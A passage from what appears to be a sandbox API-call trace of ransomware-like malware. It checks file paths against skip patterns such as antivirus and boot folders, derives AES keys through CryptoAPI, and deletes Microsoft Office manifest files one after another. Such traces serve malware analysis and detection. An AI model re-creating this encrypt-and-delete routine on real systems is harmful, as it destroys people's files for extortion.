(pszFile="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", pszSpec="*\\AVIRA\\*") returned 0 [0173.680] PathMatchSpecW (pszFile="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", pszSpec="*\\AVAST Software\\*") returned 0 [0173.680] PathMatchSpecW (pszFile="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", pszSpec="*Atheros*") returned 0 [0173.680] PathMatchSpecW (pszFile="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", pszSpec="*Realtek*") returned 0 [0173.680] PathMatchSpecW (pszFile="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", pszSpec="*bootmgr*") returned 0 [0173.680] PathMatchSpecW (pszFile="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", pszSpec="*boot*") returned 0 [0173.680] PathMatchSpecW (pszFile="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", pszSpec="*boot*") returned 0 [0173.680] PathMatchSpecW (pszFile="AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml", pszSpec="*CONFIG.SYS*") returned 0 [0173.682] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444824 | out: phHash=0x1d444824) returned 1 [0173.682] CryptHashData (hHash=0x9ad578, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0173.682] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad578, dwFlags=0x4, phKey=0x1d444828 | out: phKey=0x1d444828*=0x9ad1b8) returned 1 [0173.683] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0173.683] CryptSetKeyParam (hKey=0x9ad1b8, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0173.683] wcslen (_String="\\\\?\\") returned 0x4 [0174.118] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml") returned 1 [0174.119] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0000-1000-0000000ff1ce.xml")) returned 1 [0174.125] CryptDestroyKey (hKey=0x9ad838) returned 1 [0174.126] wcslen (_String="OK") returned 0x2 [0174.126] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0174.126] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0174.126] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0174.126] CryptDestroyHash (hHash=0x9ad578) returned 1 [0174.126] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0174.127] CryptCreateHash (in: hProv=0x8e3000, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44480c | out: phHash=0x1d44480c) returned 1 [0174.128] CryptHashData (hHash=0x9ad2f8, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0174.128] CryptDeriveKey (in: hProv=0x8e3000, Algid=0x6610, hBaseData=0x9ad2f8, dwFlags=0x4, phKey=0x1d444810 | out: phKey=0x1d444810*=0x9ad738) returned 1 [0174.128] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0174.128] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0174.128] wcslen (_String="\\\\?\\") returned 0x4 [0174.181] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml") returned 1 [0174.181] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001A-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001a-0409-1000-0000000ff1ce.xml")) returned 1 [0174.187] CryptDestroyKey (hKey=0x9ad1b8) returned 1 [0174.187] wcslen (_String="OK") returned 0x2 [0174.187] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0174.187] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0174.187] CryptDestroyKey (hKey=0x9ad738) returned 1 [0174.187] CryptDestroyHash (hHash=0x9ad2f8) returned 1 [0174.187] CryptReleaseContext (hProv=0x8e3000, dwFlags=0x0) returned 1 [0174.189] CryptCreateHash (in: hProv=0x8e36e8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444734 | out: phHash=0x1d444734) returned 1 [0174.189] CryptHashData (hHash=0x9ad438, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0174.189] CryptDeriveKey (in: hProv=0x8e36e8, Algid=0x6610, hBaseData=0x9ad438, dwFlags=0x4, phKey=0x1d444738 | out: phKey=0x1d444738*=0x9ad338) returned 1 [0174.189] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0174.189] CryptSetKeyParam (hKey=0x9ad338, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0174.189] wcslen (_String="\\\\?\\") returned 0x4 [0174.458] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml") returned 1 [0174.458] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0000-1000-0000000ff1ce.xml")) returned 1 [0174.463] CryptDestroyKey (hKey=0x9ad838) returned 1 [0174.464] wcslen (_String="OK") returned 0x2 [0174.464] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0174.464] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0174.464] CryptDestroyKey (hKey=0x9ad338) returned 1 [0174.464] CryptDestroyHash (hHash=0x9ad438) returned 1 [0174.464] CryptReleaseContext (hProv=0x8e36e8, dwFlags=0x0) returned 1 [0174.466] CryptCreateHash (in: hProv=0x8e2d58, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449bc | out: phHash=0x1d4449bc) returned 1 [0174.466] CryptHashData (hHash=0x9ad738, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0174.466] CryptDeriveKey (in: hProv=0x8e2d58, Algid=0x6610, hBaseData=0x9ad738, dwFlags=0x4, phKey=0x1d4449c0 | out: phKey=0x1d4449c0*=0x9ad3b8) returned 1 [0174.466] CryptSetKeyParam (hKey=0x9ad3b8, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0174.466] CryptSetKeyParam (hKey=0x9ad3b8, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0174.466] wcslen (_String="\\\\?\\") returned 0x4 [0174.523] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml") returned 1 [0174.524] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001B-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001b-0409-1000-0000000ff1ce.xml")) returned 1 [0174.524] CryptDestroyKey (hKey=0x9ad5f8) returned 1 [0174.524] wcslen (_String="OK") returned 0x2 [0174.525] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0174.525] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0174.525] CryptDestroyKey (hKey=0x9ad3b8) returned 1 [0174.525] CryptDestroyHash (hHash=0x9ad738) returned 1 [0174.525] CryptReleaseContext (hProv=0x8e2d58, dwFlags=0x0) returned 1 [0174.526] CryptCreateHash (in: hProv=0x8e3440, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4449d4 | out: phHash=0x1d4449d4) returned 1 [0174.526] CryptHashData (hHash=0x9ad1b8, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0174.526] CryptDeriveKey (in: hProv=0x8e3440, Algid=0x6610, hBaseData=0x9ad1b8, dwFlags=0x4, phKey=0x1d4449d8 | out: phKey=0x1d4449d8*=0x9ad738) returned 1 [0174.526] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0174.526] CryptSetKeyParam (hKey=0x9ad738, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0174.526] wcslen (_String="\\\\?\\") returned 0x4 [0174.534] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml") returned 1 [0174.534] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0409-1000-0000000ff1ce.xml")) returned 1 [0174.535] CryptDestroyKey (hKey=0x9ad238) returned 1 [0174.535] wcslen (_String="OK") returned 0x2 [0174.535] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0174.535] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0174.535] CryptDestroyKey (hKey=0x9ad738) returned 1 [0174.535] CryptDestroyHash (hHash=0x9ad1b8) returned 1 [0174.535] CryptReleaseContext (hProv=0x8e3440, dwFlags=0x0) returned 1 [0174.537] CryptCreateHash (in: hProv=0x8e2de0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44483c | out: phHash=0x1d44483c) returned 1 [0174.537] CryptHashData (hHash=0x9ad138, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0174.537] CryptDeriveKey (in: hProv=0x8e2de0, Algid=0x6610, hBaseData=0x9ad138, dwFlags=0x4, phKey=0x1d444840 | out: phKey=0x1d444840*=0x9ad378) returned 1 [0174.537] CryptSetKeyParam (hKey=0x9ad378, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0174.537] CryptSetKeyParam (hKey=0x9ad378, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0174.537] wcslen (_String="\\\\?\\") returned 0x4 [0174.540] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml") returned 1 [0174.540] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-040C-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-040c-1000-0000000ff1ce.xml")) returned 1 [0174.541] CryptDestroyKey (hKey=0x9ad838) returned 1 [0174.541] wcslen (_String="OK") returned 0x2 [0174.541] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0174.541] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0174.541] CryptDestroyKey (hKey=0x9ad378) returned 1 [0174.541] CryptDestroyHash (hHash=0x9ad138) returned 1 [0174.541] CryptReleaseContext (hProv=0x8e2de0, dwFlags=0x0) returned 1 [0174.543] CryptCreateHash (in: hProv=0x8e3770, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44480c | out: phHash=0x1d44480c) returned 1 [0174.543] CryptHashData (hHash=0x9ad138, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0174.543] CryptDeriveKey (in: hProv=0x8e3770, Algid=0x6610, hBaseData=0x9ad138, dwFlags=0x4, phKey=0x1d444810 | out: phKey=0x1d444810*=0x9ad238) returned 1 [0174.543] CryptSetKeyParam (hKey=0x9ad238, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0174.543] CryptSetKeyParam (hKey=0x9ad238, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0174.543] wcslen (_String="\\\\?\\") returned 0x4 [0174.805] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml") returned 1 [0174.805] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-001F-0C0A-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-001f-0c0a-1000-0000000ff1ce.xml")) returned 1 [0174.806] CryptDestroyKey (hKey=0x9ad3b8) returned 1 [0174.806] wcslen (_String="OK") returned 0x2 [0174.806] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0174.806] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0174.806] CryptDestroyKey (hKey=0x9ad238) returned 1 [0174.806] CryptDestroyHash (hHash=0x9ad138) returned 1 [0174.806] CryptReleaseContext (hProv=0x8e3770, dwFlags=0x0) returned 1 [0174.807] CryptCreateHash (in: hProv=0x8e3a18, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444a1c | out: phHash=0x1d444a1c) returned 1 [0174.808] CryptHashData (hHash=0x9ad138, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0174.808] CryptDeriveKey (in: hProv=0x8e3a18, Algid=0x6610, hBaseData=0x9ad138, dwFlags=0x4, phKey=0x1d444a20 | out: phKey=0x1d444a20*=0x9ad838) returned 1 [0174.808] CryptSetKeyParam (hKey=0x9ad838, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0174.808] CryptSetKeyParam (hKey=0x9ad838, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0174.808] wcslen (_String="\\\\?\\") returned 0x4 [0174.860] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml") returned 1 [0174.860] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0027-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0027-0000-1000-0000000ff1ce.xml")) returned 1 [0174.862] CryptDestroyKey (hKey=0x9ad178) returned 1 [0174.862] wcslen (_String="OK") returned 0x2 [0174.862] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0174.862] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0174.862] CryptDestroyKey (hKey=0x9ad838) returned 1 [0174.862] CryptDestroyHash (hHash=0x9ad138) returned 1 [0174.862] CryptReleaseContext (hProv=0x8e3a18, dwFlags=0x0) returned 1 [0174.864] CryptCreateHash (in: hProv=0x8e37f8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44477c | out: phHash=0x1d44477c) returned 1 [0174.864] CryptHashData (hHash=0x9ad738, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0174.864] CryptDeriveKey (in: hProv=0x8e37f8, Algid=0x6610, hBaseData=0x9ad738, dwFlags=0x4, phKey=0x1d444780 | out: phKey=0x1d444780*=0x9ad138) returned 1 [0174.864] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0174.864] CryptSetKeyParam (hKey=0x9ad138, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0174.864] wcslen (_String="\\\\?\\") returned 0x4 [0174.866] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml") returned 1 [0174.867] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-002C-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-002c-0409-1000-0000000ff1ce.xml")) returned 1 [0174.868] CryptDestroyKey (hKey=0x9ad838) returned 1 [0174.868] wcslen (_String="OK") returned 0x2 [0174.868] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0174.868] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0174.868] CryptDestroyKey (hKey=0x9ad138) returned 1 [0174.868] CryptDestroyHash (hHash=0x9ad738) returned 1 [0174.868] CryptReleaseContext (hProv=0x8e37f8, dwFlags=0x0) returned 1 [0174.870] CryptCreateHash (in: hProv=0x8e2de0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4447dc | out: phHash=0x1d4447dc) returned 1 [0174.870] CryptHashData (hHash=0x9ad838, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0174.870] CryptDeriveKey (in: hProv=0x8e2de0, Algid=0x6610, hBaseData=0x9ad838, dwFlags=0x4, phKey=0x1d4447e0 | out: phKey=0x1d4447e0*=0x9ad1f8) returned 1 [0174.870] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0174.870] CryptSetKeyParam (hKey=0x9ad1f8, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0174.870] wcslen (_String="\\\\?\\") returned 0x4 [0174.873] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml") returned 1 [0174.873] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0054-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0054-0409-1000-0000000ff1ce.xml")) returned 1 [0174.874] CryptDestroyKey (hKey=0x9ad738) returned 1 [0174.874] wcslen (_String="OK") returned 0x2 [0174.874] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0174.874] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0174.874] CryptDestroyKey (hKey=0x9ad1f8) returned 1 [0174.874] CryptDestroyHash (hHash=0x9ad838) returned 1 [0174.874] CryptReleaseContext (hProv=0x8e2de0, dwFlags=0x0) returned 1 [0174.876] CryptCreateHash (in: hProv=0x8e2e68, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448e4 | out: phHash=0x1d4448e4) returned 1 [0174.876] CryptHashData (hHash=0x9ad438, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0174.876] CryptDeriveKey (in: hProv=0x8e2e68, Algid=0x6610, hBaseData=0x9ad438, dwFlags=0x4, phKey=0x1d4448e8 | out: phKey=0x1d4448e8*=0x9ad838) returned 1 [0174.876] CryptSetKeyParam (hKey=0x9ad838, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0174.876] CryptSetKeyParam (hKey=0x9ad838, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0174.876] wcslen (_String="\\\\?\\") returned 0x4 [0174.962] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml") returned 1 [0174.963] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0057-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0057-0000-1000-0000000ff1ce.xml")) returned 1 [0174.965] CryptDestroyKey (hKey=0x9ad678) returned 1 [0174.965] wcslen (_String="OK") returned 0x2 [0174.965] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0174.965] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0174.965] CryptDestroyKey (hKey=0x9ad838) returned 1 [0174.965] CryptDestroyHash (hHash=0x9ad438) returned 1 [0174.965] CryptReleaseContext (hProv=0x8e2e68, dwFlags=0x0) returned 1 [0174.967] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44477c | out: phHash=0x1d44477c) returned 1 [0174.967] CryptHashData (hHash=0x9ad478, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0174.967] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad478, dwFlags=0x4, phKey=0x1d444780 | out: phKey=0x1d444780*=0x9ad8b8) returned 1 [0174.967] CryptSetKeyParam (hKey=0x9ad8b8, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0174.967] CryptSetKeyParam (hKey=0x9ad8b8, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0174.967] wcslen (_String="\\\\?\\") returned 0x4 [0174.971] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml") returned 1 [0174.971] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-006E-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-006e-0409-1000-0000000ff1ce.xml")) returned 1 [0174.972] CryptDestroyKey (hKey=0x9ad878) returned 1 [0174.972] wcslen (_String="OK") returned 0x2 [0174.972] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0174.972] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0174.972] CryptDestroyKey (hKey=0x9ad8b8) returned 1 [0174.972] CryptDestroyHash (hHash=0x9ad478) returned 1 [0174.972] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0174.973] CryptCreateHash (in: hProv=0x8e3088, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44477c | out: phHash=0x1d44477c) returned 1 [0174.974] CryptHashData (hHash=0x9ad5f8, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0174.974] CryptDeriveKey (in: hProv=0x8e3088, Algid=0x6610, hBaseData=0x9ad5f8, dwFlags=0x4, phKey=0x1d444780 | out: phKey=0x1d444780*=0x9ad478) returned 1 [0174.974] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0174.974] CryptSetKeyParam (hKey=0x9ad478, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0174.974] wcslen (_String="\\\\?\\") returned 0x4 [0175.221] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml") returned 1 [0175.221] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0000-1000-0000000ff1ce.xml")) returned 1 [0175.224] CryptDestroyKey (hKey=0x9ad5b8) returned 1 [0175.224] wcslen (_String="OK") returned 0x2 [0175.225] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0175.225] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0175.225] CryptDestroyKey (hKey=0x9ad478) returned 1 [0175.225] CryptDestroyHash (hHash=0x9ad5f8) returned 1 [0175.225] CryptReleaseContext (hProv=0x8e3088, dwFlags=0x0) returned 1 [0175.227] CryptCreateHash (in: hProv=0x8e35d8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d444974 | out: phHash=0x1d444974) returned 1 [0175.227] CryptHashData (hHash=0x9ad4f8, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0175.227] CryptDeriveKey (in: hProv=0x8e35d8, Algid=0x6610, hBaseData=0x9ad4f8, dwFlags=0x4, phKey=0x1d444978 | out: phKey=0x1d444978*=0x9ad838) returned 1 [0175.227] CryptSetKeyParam (hKey=0x9ad838, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0175.227] CryptSetKeyParam (hKey=0x9ad838, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0175.227] wcslen (_String="\\\\?\\") returned 0x4 [0175.564] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml") returned 1 [0175.564] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-0090-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-0090-0409-1000-0000000ff1ce.xml")) returned 1 [0175.565] CryptDestroyKey (hKey=0x9ad6b8) returned 1 [0175.565] wcslen (_String="OK") returned 0x2 [0175.565] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0175.565] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0175.565] CryptDestroyKey (hKey=0x9ad838) returned 1 [0175.565] CryptDestroyHash (hHash=0x9ad4f8) returned 1 [0175.565] CryptReleaseContext (hProv=0x8e35d8, dwFlags=0x0) returned 1 [0175.568] CryptCreateHash (in: hProv=0x8e2ef0, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44489c | out: phHash=0x1d44489c) returned 1 [0175.568] CryptHashData (hHash=0x9ad178, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0175.568] CryptDeriveKey (in: hProv=0x8e2ef0, Algid=0x6610, hBaseData=0x9ad178, dwFlags=0x4, phKey=0x1d4448a0 | out: phKey=0x1d4448a0*=0x9ad2f8) returned 1 [0175.568] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0175.568] CryptSetKeyParam (hKey=0x9ad2f8, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0175.568] wcslen (_String="\\\\?\\") returned 0x4 [0175.582] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml") returned 1 [0175.582] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0000-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0000-1000-0000000ff1ce.xml")) returned 1 [0175.583] CryptDestroyKey (hKey=0x9ad8b8) returned 1 [0175.583] wcslen (_String="OK") returned 0x2 [0175.583] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0175.583] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0175.583] CryptDestroyKey (hKey=0x9ad2f8) returned 1 [0175.583] CryptDestroyHash (hHash=0x9ad178) returned 1 [0175.583] CryptReleaseContext (hProv=0x8e2ef0, dwFlags=0x0) returned 1 [0175.585] CryptCreateHash (in: hProv=0x8e33b8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d44498c | out: phHash=0x1d44498c) returned 1 [0175.585] CryptHashData (hHash=0x9ad4b8, pbData=0x2d7ebb0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0175.585] CryptDeriveKey (in: hProv=0x8e33b8, Algid=0x6610, hBaseData=0x9ad4b8, dwFlags=0x4, phKey=0x1d444990 | out: phKey=0x1d444990*=0x9ad3b8) returned 1 [0175.585] CryptSetKeyParam (hKey=0x9ad3b8, dwParam=0x1, pbData=0x2d7ecb0, dwFlags=0x0) returned 1 [0175.585] CryptSetKeyParam (hKey=0x9ad3b8, dwParam=0x4, pbData=0x2d7eb60*=0x1, dwFlags=0x0) returned 1 [0175.585] wcslen (_String="\\\\?\\") returned 0x4 [0175.648] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml") returned 1 [0175.648] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Microsoft Office\\PackageManifests\\AppXManifest.90160000-00A1-0409-1000-0000000FF1CE.xml" (normalized: "c:\\program files\\microsoft office\\packagemanifests\\appxmanifest.90160000-00a1-0409-1000-0000000ff1ce.xml")) returned 1 [0175.649] CryptDestroyKey (hKey=0x9ad878) returned 1 [0175.649] wcslen (_String="OK") returned 